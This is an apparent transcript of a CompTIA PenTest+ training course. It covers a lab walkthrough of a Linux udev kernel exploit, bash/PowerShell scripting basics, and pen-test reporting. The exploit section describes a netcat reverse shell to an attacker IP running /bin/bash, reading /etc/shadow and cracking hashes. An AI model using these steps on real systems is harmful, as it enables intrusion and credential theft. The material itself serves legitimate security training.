know that it works against Ubuntu systems, so that's the one I'm picking. I also want to try this one, let me go there; it's 2.6.24, this one would work as well, but let's use that other one which is right here.

Now, I can tell you in advance (you'd have to read the documentation and search for it) that this is an exploit that leverages a flaw in the udev system. udev is the system in Linux that controls devices and device files, and udev on kernel version 2.6 allows remote execution of commands via netlink. netlink is a process that can send messages to other processes, and udev accepts administrative messages sent from the netlink process. So what are we going to do here? We are going to exploit this vulnerability to send administrative commands to my target system. Fine, but to do that I actually need the exploit. How can I find that exploit? Well, I know that the file is called, let me go back there, 8572.c, so I am going to locate 8572.c, and there it is: the exploit is at /usr/share/exploitdb/exploits/linux/local/8572.c. Now keep in mind, I know that I have the exploit here because I used the searchsploit tool; searchsploit will only show me exploits or vulnerabilities that it has stored on the hard drive, so if it found that exploit, that means it exists in the system. I searched for it and there's the file.

But I need this exploit on my target machine. You can simply copy it using, for example, scp to the target machine, and we must remember that we're assuming that you somehow have gained access to that target machine with a limited user. So now you can simply scp it to that target machine; in this case that is not my IP here, my target machine's IP address is 192.168.0.22. I'm going to cancel because I already have that file there. Remember that my user is msfadmin and I'm copying it to that user's home directory.

Before I go to my target machine and do what I need to do there, I am going to create a socket in my attacking machine using the netcat command. The netcat command either opens a port, that is, opens a connection waiting for clients, or it connects to a server, using plain text messages: there's no encryption, there is no presentation going on, there is no adaptation, there is no formatting; whatever is received is the set of strings, the array of characters, that is being interpreted and executed. So in this case I am going to open a connection: I'm going to listen on port 4321. Now it's very important to keep this in mind: if this is the port that I'm defining, I will have to tell the exploit in my target machine that this is the port that the target machine should connect to. So the way that this attack will work is: we're going to leverage a vulnerability in the udev system of that target machine, that target machine will receive administrative messages from a remote host, so what I'm doing here is I'm opening a socket in my attacking machine, my Kali Linux machine, then I'm going to force my target machine to connect to this port, and this network channel will be used to send messages from my Kali Linux machine to my target machine using the netlink process. So there it is, it's listening on port 4321.

Now I'm going to go to my Metasploitable machine, and I know that I have my 8572.c exploit file there. What do I do now? I simply compile this file to generate a binary that I can execute. I am going to compile my 8572.c file, generating the binary called exploit-8572, so it will generate this exploit file here. Make sure that when you compile that file the permission of execution is set; as we can see, rwxr-xr-x, so x, execution, is there. In case it's not, make sure that you give execution permission to that file. Then I have to create in the /tmp directory a script file called run, and this is how the 8572 exploit works: it will look for this temporary file in the /tmp directory. And what is this script file? This is a bash script that will tell the exploit what command it should execute when being invoked, and the command that I want to execute is to run netcat, nc, passing as arguments the attacker machine's IP address, which is 192.168.0.20, connecting to port 4321. That's why you have to keep in mind that whatever port number you defined in your attacker machine, that's the same port number that you should specify here. And once that connection is established it should run /bin/bash, so it should open a terminal, because this is the terminal that will be used to transmit commands; this is what will enable the attacker machine to send administrative commands to that target machine.

Okay, now just one more step before we run the exploit. I mentioned that this udev vulnerability relies on the netlink process messaging processes, which means that I have to know the PID of the target machine's netlink process, which is very simple to retrieve: I simply do cat /proc/net/netlink, and the only PID that you see here with a number different from zero, that's the netlink PID; in this case it's 2404. Okay, now I can simply do exploit-8572 followed by the netlink PID, 2404, and it seems like nothing happened here, at least not here. However, when I go to my Kali Linux machine, which is my attacking machine: oh look, "connect to 192.168.0.20 from 192.168.0.30". Okay, what if I do id here? That's interesting. Remember that when this netcat connection channel was established the bash shell was created, so whatever I type here is being sent to the bash of that target machine, so I can use any shell command here. I used id and it shows me that I have the root user, so there is quite some privilege escalation, from a regular user to the administrator. In case I'm not certain that I am in that machine, let's say that I run hostname: oh yeah, so this is the Metasploitable virtual machine. Nice. Also, what if I do cat /etc/shadow? Well, that's the database that stores the hashed passwords; only administrators, the root user specifically, can read that file, so let's take a look at it. There you go, I can do whatever I want here. I could use the passwd command to redefine the password of a user; since I am the root user I could do passwd and simply redefine the password for the root user.

In case I actually want to see the password, that is, I want to crack the hashed passwords, what I could do is copy the content that I see here, or a specific line according to a user, and try to crack it using for example John the Ripper. So that's what I'm going to try to do. I already have a user here that I copied, so let's take a look at that. I'm terminating that connection, and I have here the md5-shadow.txt. If we go back here, this hash here is the same hash that we have down there, right? Same hash; I previously did this just to make it faster. So I have just one file called md5-shadow.txt with one single line. I could have the entire shadow file, but just to make it quicker I'm using just one single user, and then I'm going to invoke John the Ripper passing that file, and there it is. Now, once it's done I can use the --show option, and guess what, there is a user with the password msfadmin: one password hash cracked, zero left. So that user has that password; now I know that the msfadmin user has the password msfadmin. John the Ripper is a very simple tool, you can simply use it to crack a password, there is no mystery there. The only catch is that in order to use John the Ripper you have to have the salt: the algorithm must be an algorithm that uses a salt, and if it is, you must have that salt. So for example the msfadmin user here has this salt and here is the hash; you must have both in order to crack it using John the Ripper.

So in this video we saw how to gain privilege in a Linux system leveraging a kernel exploit. As previously mentioned, this is not a difficult task. Obviously you have to find the exploit; once you do, you have to read the documentation in order to see the nuances, the options that must be defined before you execute it, but when you execute it you instantly get administrative access to that target machine. I hope you enjoyed this video, thank you very much.

Hello, welcome, we are now initiating module 11. This is our second-to-last module of the CompTIA PenTest+ exam prep course, and the topic in this
module is writing scripts. Obviously you first need to understand why you must know how to write scripts, and then we'll focus on actually writing those scripts. First of all, the CompTIA PenTest+ exam expects you to understand scripting because pen testing, and network administration tasks in general, are very hands-on but at the same time very manual; they require a deep interaction from you as an admin or as a pen tester. That is why you need to automate many of your tasks, and there is nothing better than scripts to help you automate your daily tasks. So they want you to understand scripting so that you can write scripts that will automate whatever you're willing to do. For example, for a pen tester there is a bunch of steps that you need to execute and a bunch of tools that you need to run in a short period of time. You first need to gather information, you need to scan IPs, scan ports of different hosts and different networks. It would consume too much time if you were to scan a specific IP address and then analyze the output, then scan another IP address and read that output. So you can write scripts to shoot those port scans, even to collect the output, filter that output and send it to you by email, something that's been already filtered so you only see results that are actually helpful for you. So that is why we need to understand scripting and also be able to write scripts.

Now, the CompTIA PenTest+ exam expects you to know at least a handful of languages. We are going to fully cover bash scripting, but we are also going to understand how to write scripts in PowerShell, which is the scripting language that we have in Windows systems. We're going to focus on bash, but we're also going to cover the structure of Ruby and Python. Now, what is the difference between these languages? We're going to talk about that as we cover these scripts in each of those languages.

So to start off, let's start with a very basic shell script, a bash script, which is the hello world script. I have all these scripts that we're going to cover here, and let's start with hello.sh, and this is the content. Whenever you write a bash script, each type of script must have an extension. Although it doesn't change anything, since there is no such thing as extensions in the Linux environment, you should still create a file name with an extension so that other people, and even yourself, can know what type of content there is in that script, what language you used in that script. So when I take a look at all these hello scripts here I can see that the last one has the .sh extension, which means that this is a bash script; this one has the extension .rb, which means it's been written in Ruby; and this one is .py, Python. We're also going to see that extensions in PowerShell are .ps1.

Okay, so let's start with this one. In Linux environments you can use any text editor to create your script; usually I use vi, if you prefer to use nano that's perfectly fine, emacs, that's perfectly fine, you just have to make sure that you have that text editor with you and you can work with that script in that editor. The first line will have the interpreter of that script. Now, you can create scripts using a compiled language, and what is that? Any type of language can be written using a compiler or an interpreter. The difference is, when you use a compiled language such as Java or C, once you are done writing the source code you have to compile that source code to generate a binary file, for example an executable file. When you compile that source code the compiler will verify the source to see if there are any syntax errors; if there are, it's going to tell you "hey, there is an error here, you have to fix it", and once you fix it, it will be able to compile and generate the binary file. With an interpreted language that's not happening: you don't have the compiler, which means that the interpreter will read the source code during execution time. When you execute that file, that's when the interpreter is going to read it, and each line that is read is going to be executed. In this case we're only going to use interpreted languages.

So in this case the interpreter is going to read the first line, #!/bin/bash. Whenever the interpreter sees #! it knows that whatever comes after that is the interpreter, the tool that will interpret the rest of the code. Then it goes to the second line, which says echo hello world; echo in bash is the tool that will simply output, display, print the string that comes after echo. And then there is nothing else, but if I had another line after echo hello world, let's say date, the command date, it would execute hello world first, and if the syntax is correct it's going to print hello world, then it would go to the next line, date, which is a command to print the current date, and it would print the current date. So it executes each line before going to the next one. When you're using an interpreted language the interpreter doesn't analyze the entire content, so let's say that you have an error in your fifth line and you have a code of 10 lines: it would execute the first, the second, the third, the fourth, and when it reaches the fifth line it will return an error. Now, depending on how you created that script, it could exit right there or it can just continue: if the following lines, lines 6 to 10, do not depend on line five, then it will just generate an error on line five and continue executing lines six, seven, eight, nine, ten.

Okay, another very important detail here: when you create a text file, that text file won't have permission of execution. As we can see here by the color, it's in white, I can tell that there is no permission of execution, and we can confirm this by doing this: there, no execution. You have two ways of executing a script. The first one is you specify the interpreter and then the script name; there's the result, it simply shows hello world. Or you can give permission of execution to that script and do ./ followed by the file name, and there is the same result.

Now, this is a script that was written in bash script, or shell script. Let's take a look at another one, the same script but written in Ruby, and that is the extension .rb. So the same idea: in the first line you have the interpreter, and Ruby is at /usr/bin/ruby. Where you have echo in bash to print content, in Ruby it's puts, so puts hello world. Let's execute this, and is this going to work? No, permission denied, because I'm trying to execute a file that is not executable. So I am going to do chmod u+x to give permission of execution to hello.rb; now let me try to run it again, and there you have it, the same result. So observe that we have some differences among languages. Now let's take a look at hello.py. First line, same thing, obviously you have a different interpreter, but the way that we print is different: it's not echo, it's not puts, but it's print, and observe that you have to use parentheses. Some languages also require a semicolon at the end of each line; this is not the case here. So let me give permission of execution to hello.py and let me run it here; there you go, same output.

So it's very important that you understand at least the basics of these four languages: Ruby, Python, bash and PowerShell. Let's say that you have to pick two of those, for some reason you won't be able to cover all four languages and you have to pick two; the ones that you should tackle are going to be bash and PowerShell, at least for the CompTIA PenTest+ exam. However, I strongly recommend that you learn all four, because these four are covered by the CompTIA PenTest+ exam.

Okay, what about PowerShell? PowerShell is the scripting language for a Windows environment, so let's take a look at it. Now I am at my Metasploitable 3 virtual machine with Windows Server 2008, and the first thing that you need to do is go to the Start button and type PowerShell. There it is, you go there, you open it, and this is your PowerShell prompt. Now, just like in the Linux environment, you have to pick the text editor that you're going to use; in a Windows environment I like to use Notepad. So here we can see the three scripts that I created in PowerShell. You create that script and then you go back to your PowerShell prompt. Let's take a look at the content here, first the content of hello.ps1. Now, in a PowerShell script you don't have to define the interpreter because you are already in the PowerShell environment, you just go straight to the code. We have echo in bash, we have puts in Ruby, we have print in Python, and we have Write-Host in PowerShell. How do I run it? .\ followed by the script name; there you have it, same idea.

Okay, now let's improve it a little bit. This is the most basic script that you can ever write, a hello world script. What if I want to perform some math computation? We have here math.ps1, and there's the content. So first the idea of variables: a variable is something that you create in order to store values; it can be a string, it can be a number, but you have to create that space in memory, and that space in memory is identified by what we call a variable. So here I am creating a variable named value, and the content is 20. Then I create another variable called finalvalue; the reason is I want to assign a new value based on the content of the first variable, so finalvalue will receive content based on the value of the value variable, and I am dividing value by two, so you can see the slash there, that's the symbol to perform a division. So I'm dividing 20 by 2; the result of that computation is going to be stored in this new variable called finalvalue, and then I print the content of finalvalue. Let's see if that is going to work: there's my result.

Now what about our other languages? Let me go back here to my Kali Linux machine. The same script has been written here in bash and in Ruby; let's take a look at my math.sh script. There, so a few differences that we have in bash scripting. First of all, when I assign a value to a variable in bash I do not use the dollar sign; I only use the dollar sign when I'm invoking the content of that variable. So I'm assigning 20 to value here. Now, in PowerShell we saw that I had to create another variable receiving that computation, so I had to create finalvalue that would receive value divided by 2. In bash you don't have to assign that to a variable, you can directly print the computation, the formula that you have, but something interesting here: whenever you're dealing with math computation in bash you have to use a dollar sign, two parentheses, then the formula that you need, and then you close those two parentheses, $(( ... )). In the same way, I use the slash to perform that division. So I'm directly doing that; also observe that here I'm invoking the content of value, therefore I use the dollar sign. Let me run it; there, same result.

Okay, now we have to move forward and see some other examples, some more complex examples, and one thing that is very useful is arrays. We have to know how to implement and use arrays, so let's first take a look at the array.sh script. In bash, the way that I create an array is with parentheses: between parentheses I specify the values that I want to assign to that array, separated by spaces. So I'm creating an array variable here called array, and this is the content: the first position will have value 10, the second position 20, then 30, 40 and so forth. When I want to invoke the value of a specific position I use the dollar sign, the variable name, and between brackets the number of the position that I want to retrieve within that array. So in this case let's assume that I want to retrieve the value of position five, and we have to keep in mind that arrays start counting from zero: this is position zero, one, two, three, four, five. So in this case when I do echo ${array[5]} I'm actually accessing the sixth position, not the fifth. So let's run it; I think I don't have permission, so chmod u+x array.sh. There you go, we accessed the sixth position. Let's see how we do the same code in PowerShell; I have here array.ps1, let's look at its content. Instead of using spaces, as we can see here in bash, in PowerShell we use commas, so 10, 20, 30, 40, 50 and so forth, and there are no parentheses, just the values separated by commas. Now, very similarly, I use $array[5], and then let's try; there, same output, same result.

Now let's start focusing more on bash scripting. We took a brief look at some of the differences, at least a few of the differences, between some languages. It's very difficult to learn two, three, four different languages at the same time; we have to focus on one, but you do have to be aware that there are differences, and for the CompTIA PenTest+ exam you have to know at least those four. You have to be able to at least identify them, because what's going to happen is you won't have to create code; code will be presented to you, and you do have to understand that code, you do have to be able to identify, for example, whether this code has been written in Python, in Ruby or in PowerShell, because the answer will very likely be associated with that language.

Okay, so now let's focus on bash and see some other things that we may find and use. Two things that we have to be aware of: how to create conditions and how to create comparisons. So at first let's take a look at the comparison.sh code. This is a simple script which will detect the current hour; the minutes don't matter, just the hour. So let's say that right now the hour is six; that's the hour, six, we don't see the minutes. So let me go back to the script, there it is. It's going to search for the current hour by executing the command date +%H. Now observe first: each language has its own way of dealing with it; in bash, when you want to execute a command and capture the output of that command and store it in a variable, you put it between back quotes, as you can see. Okay, so what is this script going to do? It's going to look for the current hour and, according to that value, it will present a message. So the idea is: if it's between midnight and 6 am it will show "you should be in bed"; if it's between 6 am and 12, well, actually if it's lower than 12, it's going to show "good morning"; if it's lower than 18 it's going to show "good afternoon"; if it's lower than 23 it's going to show "good evening". Now, first of all observe that if it's lower than 23 it will cover from zero hours and zero minutes up to 23 hours and 59 minutes. When I say lower than 18 it covers from zero, which is midnight and 0 minutes, until 18:59; same thing for 12, from 0 to 12:59. Actually I should fix this because it should be 11:59 and 17:59, but that doesn't matter to our code right now; same thing here, zero to 6:59.

Now observe that there is a catch here, actually there is an error, and that error is: since I'm creating independent conditions, different messages will be displayed for the same hour. So let's say that it's five am. Well, is hour, in this case five, lower than six? Yes it is, so it's going to show "you should be in bed". Then it's going to test: is 5 lower than 12? It is as well, so it's going to show "good morning". Is it lower than 18? Yes it is, so it's going to show "good afternoon". And it's lower than 23, so it's going to show "good evening".

Now regarding this syntax: whenever we want to create a condition, at least in bash, we do if, and this is the same for any language, just the formatting may differ from one language to another, but in bash you do if, you use brackets and then you create your condition. In this case I want to retrieve the value of the variable hour, which is the current hour. Very important: in bash, when you want to create conditions involving numbers you have special operators to make that comparison. For example, in this case I'm using -lt, which stands for lower than. If I wanted to say lower than or equal, I would have to say -le, lower than or equal. Well, actually, what I have is correct: lower than six will cover from zero to five because it doesn't include six. Same thing here, lower than, not lower than or equal, so it doesn't include 12; it includes up to 11, and here up to 17. Oh, and there we go, here I use lower than or equal, -le 23, so this one includes 23. Okay, then I use the semicolon, the keyword then, and then what you want to do whenever that condition returns a true statement; if that is a true statement I want to display this message. Is my condition done, or at least the commands that should be executed in case the condition is true? If it's done, I end that if with a fi. Then I do another condition; now observe that these two conditions, this one and this one, are independent, and that is the problem here. I'm not using nested conditions, which I should do, because if I say "okay, if hour is lower than 12" it's including 0, 1, 2, 3, 4 and 5, which should be covered by this condition only. So I should either do "if hour greater than or equal six and lower than 12", that would be okay, or there is another solution in which we use nested ifs, and that is the next script we're going to look at. So same thing here, same thing here, all the same. Okay, let's take a look at the execution of this script right here. There, so once again, since it's six am it's not going to include this condition here, because 6 is not lower than six, it's lower than or equal, but it will include this one, this one and this one.

How can we fix that? That's why we have comparison2.sh right here, and let's take a look at some nested conditions. Now, the semantics is the same in any language, it's just the specific syntax that may differ from one language to another. In bash, the way that you create these nested conditions is: same thing here, if hour lower than 6 then echo "you should be in bed"; then, instead of doing an independent if (and you can see that I did not finalize this if here, this keyword is inside that first if), I could either do else, or I could do another if, one if inside another if, but in this case I'm using elif, else if, which stands for "if it is not lower than six, but there is still another condition". So that's why I have if, elif, elif: if hour is lower than 12. Observe it will only reach here if hour is not lower than 6, so it must be greater than or equal to six, six or above, but at the same time it must be lower than 12, so it will range from 6 to 11. Then I display "good morning". I do the same thing for lower than 18: it will only reach here if it's not lower than 12, which means from 12 up to 18; no, actually not 18 but 17, because it's lower than 18. Now observe that for the final one I only do else. Why? Because it will only get here if it's not lower than 18, which is from 18 up to, well, the highest hour that we have is 23, so I don't have to check whether it's lower than or equal to 23 or not; it must be echo "good evening". And then I only do one fi, I only finalize that if over there. Let's take a look at
it oops ah nice now using the same code we can do something more let's say interactive in regards to the user that is running that script in this script the the script will interact with the user it will ask for an answer so I'm using Echo here to display this message actually it's a question continuous the execution of this script then we have the bash command read read caught when you invoke the read command the bash script will wait for the interaction of the user it will wait for the user to inform something to type
something for the user's input when that user enters something that content will be stored in the count variable and then I continue I use the same code but observe that now what I'm doing is I'm comparing the content of the count variable with a string observe that I'm not using those special comparison characters as we do when we have a a number comparison I'm not using Dash l e Dash LT Dash EQ if I was to compare two numbers whether those two numbers are equal to each other I would use Dash EQ since I'm not
comparing numbers I'm comparing a string then I use two equals this is two equals right here if count equals yes then it will execute that code go we go down here if it's not equal to yes it will exit my code so when the user enters something if this is different from yes it will check is what the user entered equal to yes no it wasn't okay so exit it's not going to execute all this if it is equal to yes then okay execute it let's take a look at it oh that's three continue with
the execution of the script yes what is the current hour it's let's say that it's 15. good afternoon so observe here that now I'm not using this system's current hour the user is informing that so let's go back to the code if the user answered yes I'm gonna ask another question which is what is the current hour the user is going to inform that hour and the entire code will depend on what the user informed so let's run it again continue with the execution of this script yes what is the current hour let's say it's
20. Good evening. Continue with the execution of the script? Yes. Let's say it's 10 a.m. Good morning. Now what if I say no? There, it's not going to execute that content. So in this script you can see some more interaction between the script and the end user. Now let's move forward and take a look at loops. We have two basic loops; we have more, but the basic loops, the ones that are actually used and that you're going to see around in bash, are for and while. Let's take a look at the for loop first. Very similar to any other language, right? You create a for, and between the parentheses you're going to have the initialization, how you initialize a variable, and this is the variable that should be used as a reference for the execution of that loop, so I'm initializing x with 1. Then the condition for how long you want to execute this for loop: until x is lower than or equal 10; observe that the way that I do this comparison is lower than or equal. Then semicolon, and then what you want to execute at each iteration of that code. Okay, so in each iteration I want to increment x by 1. So for, parenthesis, parenthesis, those values, close both parentheses, semicolon, do. When the bash interpreter finds do, it knows that whatever comes below should be executed in case this condition here is true, until it finds done. So what am I doing here? Initializing x with 1; I want to execute it until, while actually, x is lower than or equal to 10, and at each iteration I want to increment it by one. So it will iterate 10 times, and each time x will be incremented: so the first time it will be 1, the second iteration 2, then 3, then 4, and at each iteration its content will be displayed. Let's take a look at it. There you go. Now not all languages have this capability, although most of them do, and bash does as well, which is the capability of creating a for loop that is not created by using the parentheses; it is more flexible, you can create its own condition using an array, for example. So in this case I am using a shell command, which is the seq command; it creates a sequence, and this sequence will start with 1 and go until 10. Since it's a shell command, a bash command, I have to use the back quotes. So for x in, and then I create the range of possibilities, and the range of possibilities is 1 to 10. It's going to do the same thing, same result, same output as the previous code, but you can see that I can create my range over here in a more flexible way. Why do I say that it's more flexible? Because you can use any command or any syntax that you want; it's not fixed like start a variable with this value, increment that variable, and do it until that variable reaches that other specific value. Now I create my range of possibilities right here. Now lastly let's take a look at the while loop, and this is a code that will do the same thing. In while you don't have the possibility, as you do in for between the parentheses, of defining how the variable will be initiated, and in case you want to change something during each iteration, you cannot do that. So first of all I have to initiate my variable outside of that loop, and I have to increment it at each iteration. Other than that I have the same thing as my first for code, as we can compare here: this came over here, this came over here, but we're going to have the same result. There. Now let's take a look at this while here. We're going to go back to that script that will say good morning,
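Before moving on to the while version of the greeting script: the three loop forms just described, written out as an added example that is not the course's own script. Each loop is wrapped in a function so the three outputs can be compared; seq is assumed to be available, and the $(...) form is used where the video uses back quotes.

```bash
#!/usr/bin/env bash
# Added example: three bash loops that produce the same output (1..10),
# each wrapped in a function so the results can be compared.

# C-style for: initialisation, condition and increment all inside (( )).
count_for() {
    for ((x = 1; x <= 10; x++)); do
        echo "$x"
    done
}

# for-in over a command's output: seq builds the range, $(...) captures it
# (the video uses back quotes; $(...) is the modern, nestable spelling).
count_for_in() {
    for x in $(seq 1 10); do
        echo "$x"
    done
}

# while: the variable is initialised before the loop and incremented inside
# it, because while has no initialisation/increment slots of its own.
count_while() {
    x=1
    while [ "$x" -le 10 ]; do
        echo "$x"
        x=$((x + 1))
    done
}

# Compare the three outputs; prints "all loops agree" when they match.
check_loops() {
    a=$(count_for); b=$(count_for_in); c=$(count_while)
    if [ "$a" = "$b" ] && [ "$b" = "$c" ]; then
        echo "all loops agree"
    else
        echo "outputs differ"
    fi
}

check_loops
```

The for-in form is the one you will meet most in pen-testing scripts, because the "range" can be anything a command prints: a list of hosts from a file, a sequence of ports, or the lines of another tool's output.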
good afternoon and good evening, or you should be in bed, according to the hour. However, the difference is I put everything inside a while, and here you have something a little bit different: instead of using two parentheses I'm using just one bracket. That is perfectly fine as long as you remember to leave these spaces here. Okay, so that same code, the same code over here, I think it's comparison... is it three? Yeah. So the same one that would ask "continue with the execution of this script", but the question was regarding executing the script only once: do you want to execute it once? If you don't, you won't execute it, not even once. In this one I have a loop that will execute the content forever, until you say no, I don't want to continue with the execution. So let's take a look at it. First of all I'm creating a condition, which is: execute the entire code until count is not equal to yes. If count is equal to yes, you just keep executing the script, and at each iteration it will ask that question again: continue with the execution of this script? Let's say that I say yes. Okay, it will go back up here, because the loop is done, so it goes back up there to perform another test: is count equal to yes? Yes it is, so it will do all this again, ask again, continue with the execution? Yes. Everything again, until I say no. Is count equal to yes? No it's not, then it leaves that loop. However, to enter the loop I have to have count with the content yes, so that's why I'm doing this outside of the loop. Let's take a look at the execution of this script right here. What is the current hour? Let's say it's 3. You should be in bed. Do you want to continue with the execution of this script? Yes. What is the current hour? Let's say it's 20. Good evening. Continue with the execution of the script? Yes. What is the current hour? 13. Good afternoon. Continue with the execution of the script? No. And it leaves the script. So you have to keep in mind that for the CompTIA PenTest+ exam you have to know how to write
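The scripts walked through above (the independent ifs, the elif version, and the read-driven while loop) reconstructed as one added example; this is my own reconstruction, not the course's comparison scripts. The hour is passed as a function argument instead of taken from the system clock, the loop reads from standard input so it can be fed non-interactively, and a check for non-numeric or out-of-range input is added, which the original scripts do not have.

```bash
#!/usr/bin/env bash
# Added example: the greeting script in two versions plus the interactive
# while loop that keeps asking for the hour until the user answers "no".

# Independent ifs: every condition is tested, so hour 5 prints four lines.
greet_independent() {
    hour=$1
    if [ "$hour" -lt 6 ];  then echo "You should be in bed"; fi
    if [ "$hour" -lt 12 ]; then echo "Good morning"; fi
    if [ "$hour" -lt 18 ]; then echo "Good afternoon"; fi
    if [ "$hour" -le 23 ]; then echo "Good evening"; fi
}

# Nested conditions with elif/else: exactly one branch runs. -lt/-le/-gt are
# the numeric comparisons; each elif is reached only when the previous failed.
greet() {
    hour=$1
    # Added input check (not in the course script): reject non-digits and >23.
    case $hour in
        ''|*[!0-9]*) echo "Please enter a whole number between 0 and 23"; return 1 ;;
    esac
    if [ "$hour" -gt 23 ]; then
        echo "Please enter a whole number between 0 and 23"; return 1
    fi
    if [ "$hour" -lt 6 ]; then
        echo "You should be in bed"
    elif [ "$hour" -lt 12 ]; then
        echo "Good morning"
    elif [ "$hour" -lt 18 ]; then
        echo "Good afternoon"
    else
        echo "Good evening"      # 18..23: nothing left to test
    fi
}

# Interactive loop: read waits for a line of input. Strings are compared with
# = (bash's [ also accepts the == the video uses), numbers with -lt/-le/-eq.
# The variable must already hold "yes" or the loop body never runs.
ask_loop() {
    answer=yes
    while [ "$answer" = "yes" ]; do
        echo "What is the current hour?"
        read -r hour
        greet "$hour"
        echo "Continue with the execution of this script? (yes/no)"
        read -r answer
    done
}

# Run the loop only when a terminal is attached, so the functions can also be
# exercised by piping answers in, e.g.: printf '3\nyes\n20\nno\n' | ask_loop
if [ -t 0 ]; then
    ask_loop
fi
```

Feeding the answers through a pipe is also how you would test such a script in a CI job, where nobody is sitting at the keyboard.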
and interpret scripts, because this is an automation task: you create scripts to automate your tasks. Obviously the scripts that you're going to see in the CompTIA PenTest+ exam are more associated with networking and pen testing tasks, so you're going to see, for example, a script that is invoking the execution of nmap, or a script that is invoking the execution of the netcat (nc) command. But that really doesn't matter; what matters is whether you're capable in regards to scripting, whether you are capable of analyzing the code according to the language, because the tool you already know how to use. If you see a script that is invoking nmap, you know nmap; if you see a script that is invoking netcat, you know how to use netcat. That is not a problem. So keep in mind at least these four languages: PowerShell, bash, Python, Ruby. Those are mandatory for the CompTIA PenTest+ exam. I hope you enjoyed this video, thank you very much. Hello, welcome to module 12. In the CompTIA PenTest+ exam, or at least its syllabus, the last topic, or at least what is
listed as the last topic, is communication and writing reports. So as you already know by now, the CompTIA PenTest+ exam is not only focused on the technical aspects of pen testing; you have to also know how to write reports, how to communicate with your client, how to write documents such as the statement of work, how to define the rules of engagement, all those concepts that you should be aware of by now. Therefore communication and reporting is also another topic that should be covered to get ready for the CompTIA PenTest+ exam, and that is why we're going to start talking about communication. So first of all you have to be aware that communication is a resource that you should use in all phases, during all phases. What does that mean? That means that, although ideally, once you start the pen test phase, you are only going to deliver documents once you complete that phase. Now this is just an idea, and in general that's what you should do, that's how you should proceed; obviously this can change according to the rules of engagement and the statement of work that you establish with your client. So you may have a client that would say, okay, I want milestone reports, I want partial reports, but that would be an exception. As a rule, what you should do is write just a final report. However, in order to finalize all the pen testing tasks that you have to execute, you should communicate with that client during all phases, for very specific and clear reasons: feedback and expectations. So you want to know what your client thinks of what you've been doing, so you need some feedback; at the same time you want to know if you're covering the expectations, in order to know whether you are on the right path or not. Now real-time adjustments may be required. So as you communicate with your client, you're getting some feedback and you're analyzing, you're trying to understand whether you're covering the expectations or not. So if you're not getting, let's say, positive feedback, or you are getting some positive feedback but then you see that it is not quite what the client is expecting, there is something more, or maybe your scope is way too broad and you have to shorten your scope, then real-time adjustments may be required. Maybe you want to proceed in a certain way, you have a path that you want to follow, but as you communicate with your client you see, no, this is not going to work, I have to change, I have to pivot. Now keep in mind and always remember: everything should be established, should be defined. Everything, technically speaking, everything that should be performed, should also be established in the rules of engagement. So you may remember that most of the time the rules of engagement will be defined in the statement of work, so the statement of work will describe how you're going to execute the phases, the pen testing phases that you need; it should also include how you're going to communicate with that client, for some very specific reasons. Well, first of all, before we see the reasons, we have to know what we should establish in the rules of engagement in regards to communication. So for example: to whom should you communicate, who should you communicate with, whenever I see something that requires some level of communication, or if it's just a regular communication? That has to be also defined. For example, okay, if this project is going to last six months, how often are we going to communicate? Are we going to establish a weekly meeting? So how frequent is a requirement. Now associated with that frequency you also have who: who are you communicating with, is this just one specific person, is it a group of persons, and how is that communication going to work? Now the reason why you have to establish the frequency, the how, and especially the who, is to avoid third-party interference. So you don't want to have, let's say, an IT staff member coming to you and saying, hey, I saw that you were pen testing our Linux server and I am the Linux engineer, so could you share with me what you're doing, what you found, enlighten me, give me some info in advance? Even so that you can have the argument, so that you can say, hey, I'm sorry but I cannot do that, I cannot give you that information, because according to what's been established in the rules of engagement, in the statement of work, there is just one person that I can communicate with. I'm so sorry, but that's our contract. So you use this even as a tool in order to keep people from coming to you, looking for you, asking questions that should not be asked and even less should be answered. Now even though communication should have a frequency definition, there are what are called triggers, communication triggers, that may happen and that will generate unplanned communication. An unplanned communication
is a communication that arises as a requirement as you run your tasks, as you pen test. So once again, let's say that you're deploying a project that will last six months and you agreed with your client that you're going to have weekly meetings, let's say 30-minute, 60-minute weekly meetings. Now there are some triggers that will demand unplanned communication: you're going to have to have an extra meeting because of that event. So let's take a look at some of the communication triggers. According to the CompTIA PenTest+ exam, these are the communication triggers that you should be aware of. First of all, completion of a testing stage, which we could define as a milestone. So in the rules of engagement you're going to establish the frequency of the communication; however, there is also a chance that you define there with your client, okay, we're going to have milestones: whenever I complete this specific task, this milestone, we're going to have another meeting. So let's say that our weekly meetings happen on a Friday. Okay, what if I complete a task on a Sunday, for example? Are we going to wait until the next Friday to see it and talk about that milestone? If that's okay, that's okay. However, there are situations in which the client doesn't want to wait that long: once a milestone is finished, you should have a meeting, an extra meeting, but again that should also be determined by the rules of engagement. Critical finding. Now remember, all triggers are supposed to be covered by the rules of engagement, and they should be seen in the statement of work. Okay, so another one is critical finding. Let's say that you're pen testing one of the routers that client has and you find a critical flaw, a critical vulnerability. Are you going to wait another week, maybe five days, six days, until you tell your client that there is a very critical flaw that could compromise that client in a short period of time, in the near future? No, you should not do that. So if a critical vulnerability is found, you should communicate with your client, you should let him or her know on the spot. Another one is prior compromise. Let's say that you're analyzing some stuff, maybe you even got access, you were able to successfully access a server or a system, and then you see that you are not the only one that was able to compromise that server: you see that there is a backdoor installed there as well, aside from yours, in case you're installing another backdoor. Well, there is another trigger; you should let your client know, so you should have another, an extra, meeting to let him or her know. There are some situations that will even excuse meetings: you can simply, for example, text, you can send an email. So for example critical findings, prior compromise, these are some types of triggers where it may not even be possible to wait until you get that meeting; maybe the client is very busy and he or she cannot meet with you that same day, maybe not even the next day, but at the same time that person must be aware of these problems. And what you have to keep in mind, as previously mentioned, is that usually triggers demand pivoting. So imagine that you're pen testing a client and you just got access to a server, and then you find something that is very critical, in a way that you should now start focusing on that. Well, you planned something and now you have to pivot your path, you have to change your approach. Okay, that's very natural, that's very common when you're performing pen tests. However, what you must know, what you have to keep in mind in regards to communication, is that the stakeholders must be aware of that pivoting; they must be aware that you're changing some things due to something that happened, that came up and you were not expecting. So always communicate with your client, that is critical, and the CompTIA PenTest+ exam will require that from you. Now whenever vulnerabilities, or anything, let's say an anomaly, is found, that must be reported, that must be communicated, reported, but also you as a pen tester should write recommendations. Now there is a big if here, there is a big debate in regards to whether the pen tester should recommend something or not, but there is a very simple explanation
